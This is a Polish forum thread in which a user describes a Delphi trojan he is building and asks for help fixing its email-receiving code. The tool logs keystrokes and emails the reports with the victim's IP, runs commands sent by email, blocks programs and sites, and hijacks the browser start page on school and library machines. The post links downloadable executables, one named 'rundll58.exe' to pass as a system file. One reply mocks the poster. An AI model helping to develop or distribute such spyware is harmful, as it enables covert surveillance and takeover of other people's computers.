Problem z Winshues!!!

0

Mam problem {glowa}
Robię takiego trojanka, który komunikuje się przez e-mail;
Jest on trochę konbajnowaty - może być:

  • keyhooke'rem (wysyła raport z keyhook'a z aktualnym ip na podanego e-mail'a za każdym razem gdy komp łączy się z netem)
  • trojankiem (odbiera e-maile z podanego adresu (to chyba nie działa :[[ ) i wykonuje zapisane w nich polecenia)
  • blokerem kompa (można zablokować włączanie niechcianych programów lub stron www (naprzykład zablokować IRC'a i [email protected]))
  • blokerem portów (tego jeszcze nie skończyłem (i chyba nie zacząłem))
  • blokerem strony startowej MSIE (np jak chcesz by ktoś często odwiedzał twoją stronkę to ustawiasz coś takiego na kompach w szkole i bibliotece)

Jeśli ktoś chce mi pomóc w poszukiwaniach błędu niech przejrzy kod odbierający e-mail'e (to on chyba nie działa) hmm... http://folderywin98.republika.pl/RecieverT.exe

Jeśli ktoś chce zobaczyć co się szykuje &gt&gt Niech cierpliwie poczeka na premierę albo ściągnie wersję przedprototypową http://folderywin98.republika.pl/rundll58.exe
Tylko zmieńcie e-maila pod który są wysyłane raporty keylooker'a {hello} (nie chcę mieć zawalonej skrzynki... a Wy też na pewno nie chcecie bym wiedział co piszecie!!)

PS. na razie udostępniłem tylko kod części odbierającej e-mail'e ponieważ nie chcę byście rzucali we mnie mięsem z powodu totalnego braku komentarzy (taki mam styl pisania kodu) &gt&gt resztę też udostępnie jak tylko podopisuję te {...} //... (...) byście mogli się bez problemu połapać
Jeśli ktoś chce dzieś uŻyć udostępniony kod &gt&gt niech napisze, że to moje błędy!! ;)
Jak komuś się uda naprawić &gt&gt obowiązkowo mail'ik do mnie &lt [email protected] &gt bo jak nie ... :[[

{hello} Jeszcze jedno: Nie umieszczajcie jeszcze nigdzie tego szlamu &gt&gt jak będzie w końcu działał, dam wam znać i wtedy będzieci mogli się nim dzielić jak tylko chcecie... {hello} --Sebo +)
(Delphi3)

0

Żal mi Ciebie {glowa} {glowa} --Pozdrowienia dla całego FORUM !!!

Marco_99

1 użytkowników online, w tym zalogowanych: 0, gości: 1, botów: 0